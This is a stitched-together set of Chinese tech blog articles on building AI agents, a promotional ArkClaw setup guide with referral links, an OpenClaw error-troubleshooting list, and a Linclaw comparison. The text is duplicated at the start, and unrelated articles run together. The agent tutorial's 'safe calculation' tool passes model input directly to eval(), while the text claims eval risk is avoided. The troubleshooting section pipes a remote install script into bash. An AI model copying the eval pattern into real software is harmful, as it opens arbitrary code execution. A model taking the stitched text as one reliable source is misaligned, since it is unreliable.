当前最有价值的个人 Agent 场景:① 自动化重复信息收集(竞品监控、新闻摘要);② 本地文件/邮件智能处理;③ 代码审查和自动修复;④ 个人知识库问答(结合 RAG)。这些场景任务边界清晰、工具需求明确,是 Agent 落地成本最低的切入点。


总结

构建 AI Agent 的核心路径是:理解四大模块(感知/规划/记忆/工具)→ 手写最小 Agent 理解 ReAct 循环 → 选择合适框架上生产 → 逐步扩展工具集和记忆系统。Agent 工程的本质不是框架选择,而是对任务边界的清晰定义和对工具调用失败的鲁棒处理。

延伸资源:

本文内容基于 2026 年 3 月 OpenAI Agents SDK、LangGraph、DeepSeek 最新版本,框架 API 更新较快,建议对照各官方文档最新版本使用。

AI Agent 是能够自主感知环境、调用工具、循环推理并完成复杂目标的 AI 系统。与单次问答的大模型不同,Agent 具备"思考→行动→观察→再思考"的闭环能力,可以分解多步任务、跨工具协作、持久记忆上下文。本文从核心架构出发,覆盖最小可运行实现、工具定义、记忆管理、框架选型到多 Agent 协作,帮助开发者建立完整的 Agent 构建认知体系。


什么是 AI Agent?

AI Agent 是以大语言模型(LLM)为核心推理引擎,配备感知输入、规划决策、记忆存储、工具执行四大能力模块的自主 AI 系统。

与普通 LLM 调用的核心区别:

维度普通 LLM 调用AI Agent
交互方式单轮输入→输出多轮循环,自主决策下一步
工具使用可调用外部 API、代码、数据库
记忆仅当前上下文窗口短期 + 长期持久记忆
任务类型单一问答多步骤复杂目标分解
自主性可在限定范围内自主行动

OpenAI 在 2025 年发布的 Agents SDK 将其定位描述为:"配备指令和工具的 LLM,能通过内置 Agent 循环自动处理工具调用和持续迭代。"


Agent 的四大核心模块

构建一个完整的 Agent,需要理解四个基础模块:

1. 感知(Perception)

Agent 接收外部输入的能力。输入可以是文本、图像、文件、API 返回值、用户指令等。现代多模态模型(GPT-4o、Claude 3.5、Gemini 1.5)已支持文本+图像联合感知。

2. 规划(Planning)

Agent 分解目标、制定行动计划的推理机制。主流方法:

  • ReAct(Reason + Act):交替输出推理过程(Thought)和动作(Action),最常用
  • CoT(Chain of Thought):逐步思考,适合数学/逻辑推理
  • ToT(Tree of Thoughts):探索多条路径,适合复杂决策
  • Plan-and-Execute:先完整规划,再逐步执行,适合长任务

3. 记忆(Memory)

Agent 存储和检索信息的机制:

记忆类型存储位置特点实现方式
短期记忆上下文窗口会话内可见,重启丢失messages 列表
长期记忆外部数据库跨会话持久,需主动检索向量数据库(Pinecone、Chroma)
工作记忆中间变量任务执行过程中的临时状态LangGraph State
程序记忆代码/提示词固化的行为规则System Prompt

4. 工具(Tools)

Agent 调用外部能力的接口。本质是将 Python 函数暴露给 LLM,LLM 决定何时调用、传什么参数。常见工具类型:搜索引擎、代码解释器、文件读写、数据库查询、HTTP API 请求。


Agent Loop:核心运行机制

Agent 的运行遵循一个固定循环,直到任务完成或达到最大步数:

用户输入
   ↓
LLM 推理(输出 Thought + Action 或 Final Answer)
   ↓
是否调用工具?
   ├── 是 → 执行工具 → 获取 Observation → 回到 LLM 推理
   └── 否 → 输出 Final Answer → 结束

这就是 ReAct 框架的核心。每一轮循环,LLM 接收的 messages 包含:系统提示 + 历史对话 + 所有工具调用记录 + 最新 Observation。


最小可运行 Agent(从零手写)

不依赖任何框架,用 Python + OpenAI API 实现一个完整 Agent:

from openai import OpenAI
import json

client = OpenAI(
    api_key="你的API_KEY",
    base_url="https://api.openai.com/v1"  # 或兼容 OpenAI 格式的其他服务地址
)

# ① 定义工具
def get_weather(city: str) -> str:
    """模拟天气查询"""
    return f"{city}今天晴,气温 22°C"

def calculate(expression: str) -> str:
    """安全计算数学表达式"""
    try:
        return str(eval(expression))
    except Exception as e:
        return f"计算错误: {e}"

# ② 工具注册(生成 JSON Schema,供 LLM 理解)
tools = [
    {
        "type": "function",
        "function": {
            "name": "get_weather",
            "description": "查询指定城市的天气",
            "parameters": {
                "type": "object",
                "properties": {"city": {"type": "string", "description": "城市名"}},
                "required": ["city"]
            }
        }
    },
    {
        "type": "function",
        "function": {
            "name": "calculate",
            "description": "计算数学表达式",
            "parameters": {
                "type": "object",
                "properties": {"expression": {"type": "string"}},
                "required": ["expression"]
            }
        }
    }
]

# ③ 工具分发映射
tool_map = {"get_weather": get_weather, "calculate": calculate}

# ④ Agent 主循环
def run_agent(user_input: str, max_steps: int = 10):
    messages = [
        {"role": "system", "content": "你是一个助手,可以查天气和做计算。"},
        {"role": "user", "content": user_input}
    ]

    for step in range(max_steps):
        response = client.chat.completions.create(
            model="gpt-4o",
            messages=messages,
            tools=tools,
            tool_choice="auto"
        )
        msg = response.choices[0].message

        # 无工具调用 → 任务完成
        if not msg.tool_calls:
            print(f"最终回答:{msg.content}")
            return msg.content

        # 有工具调用 → 执行并回传结果
        messages.append(msg)
        for tc in msg.tool_calls:
            fn_name = tc.function.name
            fn_args = json.loads(tc.function.arguments)
            result = tool_map[fn_name](**fn_args)
            print(f"[工具] {fn_name}({fn_args}) → {result}")
            messages.append({
                "role": "tool",
                "tool_call_id": tc.id,
                "content": result
            })

    return "达到最大步数,任务未完成"

# 运行
run_agent("北京今天适合穿什么?另外 128 * 37 等于多少?")

关键设计点

  • tool_map 将工具名映射到实际函数,避免 eval 动态调用的安全风险
  • 每次工具调用结果以 role: tool 格式追加到 messages,LLM 下一轮能看到
  • max_steps 防止死循环,生产环境建议设为 15-20

用 OpenAI Agents SDK 构建(生产推荐)

OpenAI Agents SDK 是 Swarm 的生产级升级,2025 年发布,更简洁:

from agents import Agent, Runner, function_tool

@function_tool
def search_web(query: str) -> str:
    """搜索互联网获取最新信息"""
    # 接入真实搜索 API
    return f"搜索 '{query}' 的结果:..."

@function_tool
def run_code(code: str) -> str:
    """在沙箱中执行 Python 代码"""
    # 接入代码执行环境
    return f"执行结果:..."

# 创建 Agent
agent = Agent(
    name="研究助手",
    instructions="你是一个研究助手,能搜索信息并执行代码验证结论。",
    tools=[search_web, run_code]
)

# 运行
result = Runner.run_sync(agent, "分析 2025 年 AI Agent 框架的发展趋势")
print(result.final_output)

SDK 内置了 Agent Loop、自动 Schema 生成、追踪可视化,省去手写循环的工作。


框架选型指南

框架适用场景学习曲线特点
裸实现(推荐入门)学习原理、简单任务完全理解底层机制
OpenAI Agents SDK快速生产、多 Agent轻量,handoffs 机制优秀
LangGraph复杂状态机、长任务图结构编排,持久化强
LangChainRAG + Agent 混合生态最全,抽象层多
AutoGen(微软)多 Agent 对话协作对话驱动,适合模拟场景

选型建议

  • 第一次构建 → 先裸实现,理解 Agent Loop
  • 需要上生产 → OpenAI Agents SDK 或 LangGraph
  • 任务有明确状态流转 → LangGraph
  • 主要是 RAG 增强 → LangChain

记忆系统实战

短期记忆:直接用 messages 列表

# 多轮对话直接在 messages 中追加,自动形成短期记忆
messages = [{"role": "system", "content": "你是助手"}]
messages.append({"role": "user", "content": "我叫小明"})
# ... LLM 回复 ...
messages.append({"role": "user", "content": "我叫什么?"})
# LLM 可从上下文找到答案

长期记忆:向量数据库检索

from chromadb import Client

db = Client()
collection = db.get_or_create_collection("agent_memory")

# 存储记忆
collection.add(
    documents=["用户偏好:喜欢简短回答"],
    ids=["pref_001"]
)

# 检索相关记忆(在构建 System Prompt 前调用)
results = collection.query(query_texts=["用户风格"], n_results=3)
relevant_memory = "\n".join(results["documents"][0])

七牛云 AI 推理服务内置的 MCP(Model Context Protocol)支持标准化记忆编排,开发者无需本地部署向量库即可构建带长期记忆的 Agent 应用。


多 Agent 协作设计

当单个 Agent 能力边界不足以完成复杂任务时,引入多 Agent 协作。主流两种模式:

模式一:分层调度(Orchestrator + Workers)

用户输入
    ↓
调度 Agent(Orchestrator)
    ├── 研究 Agent(负责搜索信息)
    ├── 代码 Agent(负责执行计算)
    └── 写作 Agent(负责生成报告)

OpenAI Agents SDK 通过 handoffs 机制实现:调度 Agent 在合适时机将控制权移交给专门 Agent,各 Agent 有独立的工具集和系统提示。

模式二:流水线(Pipeline)

每个 Agent 处理一个阶段,输出作为下个 Agent 的输入。适合数据处理、内容生产等有明确顺序的场景。

七牛云 2025 年实践案例中,多智能体采用分层设计:规划层(DeepSeek-R1 擅长推理规划)+ 执行层(DeepSeek-V3 支持函数调用),通过职责分离规避单一模型在推理与工具调用上的能力权衡问题。


调试与追踪

Agent 调试的核心难点是"看不见中间过程",建议从第一行代码就加上追踪:

# 方法一:打印每步 messages(简单有效)
for msg in messages:
    print(f"[{msg['role']}] {str(msg.get('content', ''))[:100]}")

# 方法二:OpenAI Agents SDK 内置追踪
# 运行后自动在 platform.openai.com/traces 生成可视化时间线

# 方法三:LangSmith(LangGraph 生态)
# 设置环境变量后自动追踪每个节点的输入输出
import os
os.environ["LANGCHAIN_TRACING_V2"] = "true"
os.environ["LANGCHAIN_API_KEY"] = "你的key"

常见问题

Q:Agent 和 RAG 是什么关系?
RAG(检索增强生成)是一种为 LLM 补充外部知识的技术,本质上是一种"工具"。Agent 可以将 RAG 作为其众多工具之一——当需要查询知识库时调用 RAG,当需要执行代码时调用代码解释器。RAG 回答单次问题,Agent 完成多步任务。

Q:构建 Agent 一定要用 GPT-4 吗?成本很高?
不必。工具调用能力(Function Calling)是选择模型的核心指标。DeepSeek-V3、Kimi K2、Claude 3.5 Haiku、Qwen2.5-72B 均支持工具调用,成本远低于 GPT-4o。建议先用小模型验证逻辑,上线前再评估模型效果和成本的平衡点。

Q:Agent 执行过程中出错了怎么办?
生产级 Agent 需要实现:① 工具调用异常捕获并返回错误信息给 LLM;② max_retries 对同一工具失败后重试逻辑;③ 超时熔断,避免单步卡死整个流程;④ 检查点(Checkpoint)支持,LangGraph 内置此能力。

Q:Agent 会不会无限循环消耗 Token?
务必设置 max_steps 上限。此外,可在 System Prompt 中明确指示:"如果连续两步没有进展,输出 Final Answer 结束任务"。OpenAI Agents SDK 和 LangGraph 都提供了内置的循环终止机制。

Q:个人开发者适合用 Agent 做什么?
当前最有价值的个人 Agent 场景:① 自动化重复信息收集(竞品监控、新闻摘要);② 本地文件/邮件智能处理;③ 代码审查和自动修复;④ 个人知识库问答(结合 RAG)。这些场景任务边界清晰、工具需求明确,是 Agent 落地成本最低的切入点。


总结

构建 AI Agent 的核心路径是:理解四大模块(感知/规划/记忆/工具)→ 手写最小 Agent 理解 ReAct 循环 → 选择合适框架上生产 → 逐步扩展工具集和记忆系统。Agent 工程的本质不是框架选择,而是对任务边界的清晰定义和对工具调用失败的鲁棒处理。

延伸资源:

本文内容基于 2026 年 3 月 OpenAI Agents SDK、LangGraph、DeepSeek 最新版本,框架 API 更新较快,建议对照各官方文档最新版本使用。

大家好,我是R哥。

2026 年,OpenClaw 引爆全网,到现在还没有看到要停歇的迹象,反而越来越火了,个人在玩一人公司,连大厂们都在卷,整个 AI 生态都在玩 OpenClaw,真的是热闹非凡啊。

全网都在积极地部署 OpenClaw 来养虾,甚至还有不少玩家已经养成了好几只虾了,你确定还要做一个旁观者吗??

如果你想上手 OpenClaw,还是有一定门槛的。。

说说几大痛点和共鸣:

  • 环境配置复杂,即使是技术人员,动辄几小时甚至一天的部署时间,折腾到怀疑人生。
  • Token 消耗如流水,一不小心就超预算,成本飙升,压力山大。
  • 模型响应不稳定,关键时刻掉链子。

难道就没有一个全家桶方案,能让我们真正实现零门槛安装和使用 OpenClaw,免去复杂配置、7 × 24 在线,同时实现 Token 自由吗

别急,火山引擎这次把门槛直接拆了,小白也能部署和玩转小龙虾了。。

最近,火山引擎推出了 Arkclaw,解决了上述所有痛点,可一键部署 OpenClaw、对接飞书机器人、玩转飞书生态等,好用、方便又便宜。

Arkclaw 介绍及优势

ArkClaw 是火山引擎提供的云端 AI 智能体(Agent)服务,能实现一键云端部署 OpenClaw,享有一对一专属 ECS 资源,免去复杂配置、7 × 24 在线,零门槛使用 OpenClaw,还能无缝使用订阅的火山方舟 Coding Plan,告别 Token 按量计费焦虑。

如果你以为 Arkclaw 只是一个 OpenClaw 部署工具,那你就错了。

说说使用 Arkclaw 的优势:

  • 更优的模型适配:支持 Doubao-Seed 2.0 Pro & Lite & Code / DeepSeek 3.2 / GLM 5.0 / MiniMax 2.5 / Kimi 2.5,高效协同 Doubao-Seed 2.0;
  • 更低的使用成本:自带 Token 节省和优化,支持端云存储协同,文件无缝直连,减少重复传输与计算,构建长期记忆;
  • 更亲和飞书生态:专属飞书插件(火山 ArkClaw 独家优势),轻松处理日程安排和提醒、会议总结预定、复杂文档/表格处理,一键接入飞书专属 Skills;并内置网盘长效存储,LUl & Terminal 兼容模式,灵活易用;
  • 更安全使用环境:全面保护数据与隐私安全,支持火山专属 Skills Hub,内置 Skills 安全扫描、数据防泄漏能力,确保 Skills 质量与能力,安全可信;
  • 生态兼容:兼容 GLM、Minimax、Kimi 等更多主流模型;
  • 多功能开箱即用:定时任务、人格设置、IM一键配置,0 门槛 Web 端直接使用,功能持续迭代,常用常新。

我还发现了一个更亮眼的功能,它具备傻瓜式运维能力,提供了 Terminal 登录、OpenClaw 自动修复、Skills Hub 白屏化接入等高级功能,让运维变得前所未有的简单,不再需要专业运维技能,人人都能轻松管理和维护 OpenClaw 实例

火山的 ArkClaw 是真的把门槛打下来,小白也能养虾了,下面咱们进入 ArkClaw 接入指南及初体验!

ArkClaw 一键部署 OpenClaw

ArkClaw 的部署过程非常简单,几步操作就能完成,接下来,让我带大家一起上火山养虾,轻松部署 OpenClaw!

ArkClaw 体验入口:

https://v2ig.cn/cRm03IcFyUU/

1、订阅方舟 Coding Plan

方舟 Coding Plan 是为开发者量身打造的 AI Coding 场景订阅服务,现已全面升级,支持主流 Code 模型(Doubao-Seed-2.0-Code & Lite & Pro、Doubao-Seed-Code、GLM、Kimi、DeepSeek 等最新版本)的使用和自由切换。

Coding Plan 服务还兼容主流 AI 编码工具,如:Trae、 Claude Code、veCLI、Cursor、Cline、Codex CLI 等,为开发者提供畅快、智能、稳定的编码体验,提升代码编写效率与质量。

Coding Plan 现在可以抢先体验 ArkClaw:

Lite & Pro Plan 订阅用户都可以免费使用 ArkClaw:

  • Coding Plan Lite 订阅用户,免费体验 7 天 ArkClaw 使用权益;
  • Coding Plan Pro 订阅用户,会话周期内 ArkClaw 可持续免费使用;

太爽了,新用户首购最低 9.9 元就能试玩,量大管饱性价比高,扫码订阅即可。

通过我的邀请注册订阅 Coding Plan,再享 9 折优惠价,首月 8.9 元 就能玩起来了,订阅越多越划算。

可以通过我的邀请链接注册:

https://volcengine.com/L/zBWUFWykf2w/

有了 Coding Plan 的加持,大幅度降低玩 OpenClaw 的成本,再也不用每天计算 tokens 使用量,减少预算管控成本,专注核心开发工作,Coding Plan 简直就是 OpenClaw 这样智能 Agent 的最佳搭档。

2、创建并使用 ArkClaw

订阅任意 Coding Plan 套餐后,就可以创建 ArkClaw 实例了:

点击 “立即创建” 按钮,等个 1 - 2 分钟,就能看到 ArkClaw 实例创建成功了:

3、与 ArkClaw 进行对话

我们可以直接在 ArkClaw 的对话页面与它进行对话了:

我这里问了它是什么模型,以及它是什么操作系统,它都能正确回答,说明它已经成功部署好了。

4、设置 ArkClaw

点击右上角的设置图标:

在这里,可以重启 ArkClaw、自动修复 ArkClaw 实例、打开终端、配置模型等,其中自动修复功能非常强大,如果 ArkClaw 实例出现异常,直接点击自动修复就能帮你修复实例了,不需要任何专业的运维技能了,真正实现了傻瓜式运维

如果你是开发者,还可以打开终端,直接在云端操作 ArkClaw 实例了,不需要再通过 SSH 连接服务器了,超级方便。

通过飞书与 ArkClaw 对话

上面我们已经成功部署了 ArkClaw,并且在 ArkClaw 的对话页面和它进行了对话,接下来,我来演示一下如何通过飞书来和 ArkClaw 进行对话

现在通过扫描二维码就能一键创建机器人,太方便了。

回到 ArkClaw 对话页面,点击 “飞书配对” 按钮:

等待终端命令执行完成,会展示创建飞书机器人二维码:

然后使用手机飞书 APP 扫描该二维码,并填写机器人名称,再点击 “创建” 按钮开始创建流程:

机器人创建成功后,ArkClaw 会自动配置新建机器人信息:

期间不要关闭终端,等显示 “所有任务执行成功!” 说明配对成功了,最后关掉终端窗口就好了。

完成机器人匹配后,我们就可以通过飞书机器人与 ArkClaw 进行对话了:

这里,我和 ArkClaw 问了个好,然后让它把 OpenClaw 更新到了最新版本。

之后,我们就可以通过飞书来和 ArkClaw 进行对话了,不用每次都要回到 ArkClaw 的对话页面了,手机、电脑都能随时指挥 ArkClaw,超级方便!

ArkClaw + 飞书高级玩法

使用 ArkClaw 和飞书结合的好处就是,可以让 ArkClaw 直接在飞书里帮我们处理一些事情,让 ArkClaw 直接在飞书里帮我们安排日程、创建定时任务、生成飞书文档等,大大提升了我们的工作效率。

接下来,我来演示这几个 ArkClaw 和飞书结合的高级玩法,看看 ArkClaw 在飞书机器人里面怎么玩。

1、安排日程

先演示一个让 ArkClaw 创建飞书日程的场景,比如:

帮我定一个明天早上 9 点的日程,主题是:写一篇 ArkClaw 的原创文章。

如果没有授权过,会要求授权,点击授权后会弹出飞书授权页面,完成授权后就可以看到日程已经创建成功了:

在日历中也可以看到这个日程:

这个场景对使用 ArkClaw 的小伙伴们非常实用,可以让 ArkClaw 帮我们安排日程,提醒我们按时完成任务。

所以,学会了这点,我们再也不用担心忘记重要的事情了,也不用手动去创建日程了,一句话 ArkClaw 就帮你搞定了

2、创建定时任务

这里我再演示一个让 ArkClaw 创建定时任务的场景,比如:

每天早上 9 点,抓取一下过去 24 小时内的 AI 领域的热点新闻并生成报告。

定时任务创建成功后,ArkClaw 就会每天早上 9 点自动执行这个任务了,我们就可以每天早上都收到一份 AI 领域的热点新闻报告了

也可以让它手动执行一下这个定时任务,看看它的效果:

不错,效果杠杠的,它帮我抓取了 24 小时内的 AI 热点新闻,并且生成了一个简单的报告。

这个功能对于需要定期执行某些任务的小伙伴们来说非常实用,可以让 ArkClaw 帮我们自动执行这些任务了。

比如,如果你是程序员,你还可以让它帮你每天定时检查一下你的代码仓库,看看有没有新的 issue 或者 pull request 需要处理了,让 ArkClaw 帮我们自动执行这些重复性的任务。

3、生成飞书文档

使用 ArkClaw 最强大的功能之一就是它自带的飞书生态了,下面我演示下如何让 ArkClaw 将任务的结果保存为飞书文档,方便通过飞书查看、分享,比如:

帮我调研下 ClawHub 中下载量最多的前 10 个 Skill,将它们的功能、特点、安装方式等信息汇总为一个飞书文档。

在授权成功后,它就会自动创建一个飞书文档,并将调研结果保存到这个文档里了。

来查看这个文档:

很惊艳啊,这个功能真的太强大了。。。

学会这一招,我们就可以让 ArkClaw 直接在飞书里帮我们生成文档,有需要还可以分享出去,对于需要经常生成报告、总结的同学来说,这个功能简直就是神器了

总结

总的来说,火山引擎的 ArkClaw 真的是一个非常强的 OpenClaw 部署和使用工具,它不仅解决了 OpenClaw 部署的痛点,还提供了很多实用的功能,让我们能够更方便地使用 OpenClaw 来养虾。

谁不想要一个 7 * 24 小时的全能助手,来帮我们处理各种任务呢?

有了 ArkClaw,这一切都变得简单了,它能帮你安排日程、创建定时任务、生成飞书文档,甚至帮你写代码、调试代码,等等,使用场景非常多,一人就是一个小团队了。

更重要的是,你不需要再担心部署和运维了,让 ArkClaw 专注于帮你做更多有价值的事情吧

最后再奉上 ArkClaw 的体验入口链接:

https://v2ig.cn/cRm03IcFyUU/

一起来玩 ArkClaw 养虾吧,提升工作效率!

OpenClaw 部署过程中的问题可分为五大阶段:安装环境、网关启动、API 与模型配置、渠道消息、仪表板访问。本文整理官方文档记录的 15 个高频报错,每条给出具体命令和根本原因,配合 openclaw doctor 诊断工具,帮助快速定位并修复问题。


第一步:遇到任何问题先跑这 4 条命令

在查具体报错前,先运行官方诊断序列,输出结果能定位 80% 的问题:

openclaw status          # 整体状态概览(网关可达性、渠道认证状态、近期会话)
openclaw gateway status  # 网关运行时状态
openclaw doctor          # 配置自检 + 自动修复常见错误
openclaw logs --follow   # 实时日志流,最直观的问题追踪入口

openclaw doctor 不只是诊断,它会:自动修复旧版配置格式、检测端口冲突、验证 API Key 有效性、检查 systemd/launchd 守护进程配置,支持 --repair 参数自动应用修复。


一、安装阶段报错

问题 1:EBADENGINE — Node.js 版本不兼容

报错信息

npm warn EBADENGINE Unsupported engine {
  required: { node: '>=22' },
  current: { node: 'v18.x.x' }
}

根因:OpenClaw 要求 Node.js 22+,当前版本不满足。

修复

# macOS
brew install node@22 && brew link node@22 --force --overwrite

# Linux
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs

# Windows PowerShell
winget install OpenJS.NodeJS.LTS

问题 2:command not found — PATH 未配置

报错信息

zsh: command not found: openclaw

根因:npm 全局 bin 目录不在 PATH 中。

修复

# 找到 npm 全局路径
npm prefix -g

# 写入 shell 配置(zsh 为例)
echo 'export PATH="$(npm prefix -g)/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc

# 验证
openclaw --version

问题 3:sharp 构建错误(Windows 原生)

报错信息

npm ERR! sharp: Installation error: prebuild...

根因sharp 图像处理库在 Windows 原生环境编译失败。

修复

# 方案一:跳过 libvips 编译
$env:SHARP_IGNORE_GLOBAL_LIBVIPS=1; npm install -g openclaw@latest

# 方案二(根本解决):改用 WSL2 安装
# 在 WSL2 Ubuntu 终端执行:
curl -fsSL https://openclaw.ai/install.sh | bash

二、网关启动阶段报错

问题 4:Gateway start blocked: set gateway.mode=local

报错信息

Gateway start blocked: set gateway.mode=local

根因:网关模式未设置或被设为远程模式,阻止本地启动。

修复

# 交互式配置(推荐)
openclaw configure

# 或直接编辑配置文件 ~/.openclaw/openclaw.json
# 找到 gateway 节点,添加:
# "mode": "local"

问题 5:EADDRINUSE — 端口被占用

报错信息

Error: listen EADDRINUSE: address already in use :::18789
# 或
another gateway instance already listening

根因:OpenClaw 默认使用 18789 端口,已有进程占用。

修复

# 查找占用端口的进程
lsof -i :18789          # macOS / Linux
netstat -ano | findstr 18789  # Windows

# 杀掉旧进程(替换 PID 为实际进程号)
kill -9 <PID>           # macOS / Linux
taskkill /PID <PID> /F  # Windows

# 或更改 OpenClaw 端口(在 openclaw.json 中设置 gateway.port)
openclaw doctor --repair  # 自动检测并修复端口冲突

问题 6:守护进程启动后立即退出

症状openclaw gateway start 执行后进程消失,openclaw status 显示网关不可达。

排查步骤

# 查看完整错误日志
openclaw logs --follow

# 检查守护进程配置
openclaw doctor --deep

# Linux:检查 systemd linger(确保登出后服务继续运行)
loginctl enable-linger $USER

# 重装守护进程
openclaw gateway --install-daemon

三、API 与模型配置报错

问题 7:HTTP 429 — 长上下文速率限制

报错信息

HTTP 429: rate_limit_error: Extra usage is required for long context requests

根因:启用了 100 万 Token 上下文(context1m),但 API Key 对应账户等级不满足条件。

修复

// 在 openclaw.json 中,为该模型禁用 context1m
{
  "agents": {
    "defaults": {
      "model": "claude-3-5-sonnet-20241022",
      "modelSettings": {
        "context1m": false
      }
    }
  }
}

或配置备用模型实现自动故障转移,避免单一 API Key 限流影响服务。


问题 8:AUTH_TOKEN_MISMATCH — 令牌不匹配

报错信息

AUTH_TOKEN_MISMATCH

根因OPENCLAW_GATEWAY_TOKEN 环境变量与配置文件中的令牌不一致,或设备令牌已过期。

修复

# 检查当前配置的 token
openclaw doctor

# 重新生成并同步令牌
openclaw configure  # 重新设置 gateway token

# 云端部署(Railway/Fly.io):
# 确认环境变量 OPENCLAW_GATEWAY_TOKEN 与配置文件一致

问题 9:插件安装失败 — package.json missing openclaw.extensions

报错信息

package.json missing openclaw.extensions

根因:自定义插件的 package.json 未声明 openclaw.extensions 字段,无法找到编译后的入口文件。

修复:在插件的 package.json 中添加:

{
  "openclaw": {
    "extensions": ["dist/index.js"]
  }
}

四、渠道消息阶段报错

问题 10:发消息无回复 — 需要 @ 提及

日志信息

drop guild message (mention required)

根因:Discord/Slack 群组中启用了"提及门控",Bot 只响应 @mention 消息。

修复

# 方案一:在消息中 @提及 Bot
# 方案二:在配置中关闭提及要求
# 在 openclaw.json 的 channels.discord.groups 中:
# "requireMention": false

问题 11:发消息无回复 — 配对待审批

日志信息

pairing request from user xxx

根因:新用户首次 DM Bot,需要网关管理员审批配对请求。

修复

# 列出待审批请求
openclaw pairing list telegram   # 或 discord / whatsapp

# 批准指定配对码
openclaw pairing approve telegram <CODE>

# 或配置为开放模式(不推荐用于公开部署)
# "dmPolicy": "open"

问题 12:消息被过滤 — blocked / allowlist

日志信息

blocked: sender not in allowlist

根因:启用了 allowlist 策略,发送方用户 ID 未加入白名单。

修复

// 在 openclaw.json 中添加用户 ID 到白名单
{
  "channels": {
    "telegram": {
      "dmPolicy": "allowlist",
      "allowFrom": ["123456789", "987654321"]
    }
  }
}

五、仪表板与设备认证报错

问题 13:仪表板无法连接 — device identity required

报错信息

device identity required

根因:使用 HTTP(非 HTTPS)访问仪表板时,浏览器安全策略阻止设备认证所需的 WebCrypto API。

修复

  • 本地访问:始终使用 http://127.0.0.1:18789/(本地回环地址,浏览器视为安全上下文)
  • 远程访问:必须配置 HTTPS(Nginx 反代 + SSL 证书,或通过 Tailscale 加密隧道访问)
  • 不要使用 http://服务器IP:18789/ 直接访问远程网关

问题 14:device nonce mismatch — 设备握手失败

报错信息

device nonce mismatch

根因:设备认证握手过程中 nonce 不一致,通常由多次刷新页面或并发连接导致。

修复

# 清除浏览器缓存后重新访问
# 或重新审批设备
openclaw devices list
openclaw devices approve <deviceId>

# 若问题持续,重置设备认证
openclaw doctor --repair

问题 15:定时任务不触发 — cron scheduler disabled

报错信息

cron: scheduler disabled; jobs will not run automatically

或日志中出现:

heartbeat skipped: reason=quiet-hours

根因一:Cron 调度器被禁用。
根因二:当前时间在配置的"静默时段"内。

修复

# 检查 cron 状态
openclaw cron status

# 查看所有定时任务
openclaw cron list

# 启用调度器(在 openclaw.json 中):
# "cron": { "enabled": true }

# 如需禁用静默时段,移除 quietHours 配置块

快速排查索引

报错关键词问题编号所属阶段
EBADENGINE问题1安装
command not found问题2安装
sharp: Installation error问题3安装
Gateway start blocked问题4网关启动
EADDRINUSE问题5网关启动
网关启动后消失问题6网关启动
HTTP 429问题7API配置
AUTH_TOKEN_MISMATCH问题8API配置
openclaw.extensions问题9插件
mention required问题10渠道消息
pairing request问题11渠道消息
blocked / allowlist问题12渠道消息
device identity required问题13仪表板
device nonce mismatch问题14仪表板
cron scheduler disabled问题15定时任务


openclaw doctor 完整参数说明

openclaw doctor 是部署问题的第一响应工具,支持以下模式:

参数行为
(无参数)交互式检查,逐项确认修复
--repair自动应用所有修复,无需确认
--yes对所有提示选择默认值
--non-interactive仅执行安全迁移,不重启服务
--deep扫描额外网关安装,检测多实例冲突
--force包含激进修复(谨慎使用)

自动修复范围:旧版配置格式迁移、OAuth Token 刷新、端口冲突检测、systemd/launchd 守护进程配置验证、模型引用校验。


常见问题

Q:openclaw doctor 运行后说一切正常,但 Bot 还是没反应怎么办?
问题通常在渠道层面。依次检查:① openclaw channels status --probe 查看各渠道连接状态;② 确认发送者 ID 在 allowlist 或已完成配对;③ openclaw logs --follow 实时观察收到消息时的日志,定位消息在哪一层被丢弃。

Q:云端部署(Railway/Fly.io)和本地部署的问题排查有区别吗?
有。云端部署无法直接访问本地命令行,排查主要依赖:① 平台日志控制台(Railway Logs / Fly Logs);② https://<域名>/setup 的状态页面;③ 将 openclaw status --json 的结果通过 Bot 自身发送出来(添加一个 status 指令工具)。本地部署可以直接运行所有 openclaw * 命令行工具。

Q:更新 OpenClaw 后出现新问题怎么办?
先运行 openclaw doctor --repair 处理配置格式迁移问题。大版本升级后配置文件的 Schema 可能变化,doctor 会自动转换旧格式。如需回滚,使用 npm install -g openclaw@<旧版本号> 安装指定版本。


总结

OpenClaw 部署问题绝大多数集中在三个环节:Node.js 环境(版本和 PATH)、网关启动(端口和模式配置)、渠道配置(配对和白名单)。遇到问题时,先跑 openclaw doctor,再按本文的报错关键词索引表定位具体问题,多数情况下 5 分钟内可解决。

延伸资源:

本文基于 OpenClaw 2026 年 3 月官方文档,工具版本迭代较快,建议对照最新文档使用。

OpenClaw 的国产替代中,目前最值得关注的是七牛云推出的 Linclaw——一款无需 Node.js 环境、下载即用的桌面版 AI 助手,原生支持钉钉、飞书、QQ、微信四大国内平台,内置 Shell、文件操作、浏览器、截图等工具开箱即用。本文对比 OpenClaw 与 Linclaw 的核心差异,帮助国内用户找到最合适的方案。


OpenClaw 在国内用起来有哪些痛点?

OpenClaw 是优秀的开源 AI 助手框架,但对国内用户存在几个明显摩擦点:

  • 环境门槛高:需要 Node.js 22+、npm、命令行操作,非技术用户难以上手
  • 国内平台支持弱:官方渠道以 Telegram、Discord、WhatsApp 为主,钉钉、飞书、微信需自行配置
  • 网络依赖:安装脚本和部分依赖访问境外服务,国内网络不稳定时容易失败
  • 无 GUI:没有图形界面,全程命令行配置,学习成本集中在第一天

这些问题催生了国内开发者对"更易用的国产版本"的需求。


Linclaw 是什么?

Linclaw 是七牛云基于 OpenClaw 理念推出的桌面版 AI 助手,核心定位是零部署、国产平台优先、开箱即用

一句话描述:把 OpenClaw 的 AI Agent 能力打包成 Windows/macOS 安装包,国内用户下载即可使用,无需任何环境配置。

基本信息

  • 开源协议:MIT
  • 支持私有部署
  • 官网:linclaw.qnlinking.com
  • 技术底座:ReAct Agent 架构(基于 AgentScope)+ 七牛云 MaaS 驱动

Linclaw vs OpenClaw:核心对比

对比项OpenClawLinclaw
安装方式npm 命令行安装,需 Node.js 22+DMG / EXE 安装包,双击安装
环境要求Node.js 22+、npm无(开箱即用)
GUI 界面无,全命令行有桌面客户端
国内平台需手动配置钉钉、飞书、QQ、微信原生支持
国际平台Telegram、Discord、WhatsAppTelegram、Discord、Slack、iMessage
内置工具需配置插件Shell、文件、浏览器、截图开箱即用
AI 模型25+ 家提供商七牛云 MaaS(DeepSeek/Kimi/GLM 等)
定时任务支持支持(APScheduler + Cron)
MCP 协议支持支持
记忆能力短期 + 长期多轮记忆 + 智能压缩
适合人群技术开发者技术 + 非技术用户均可
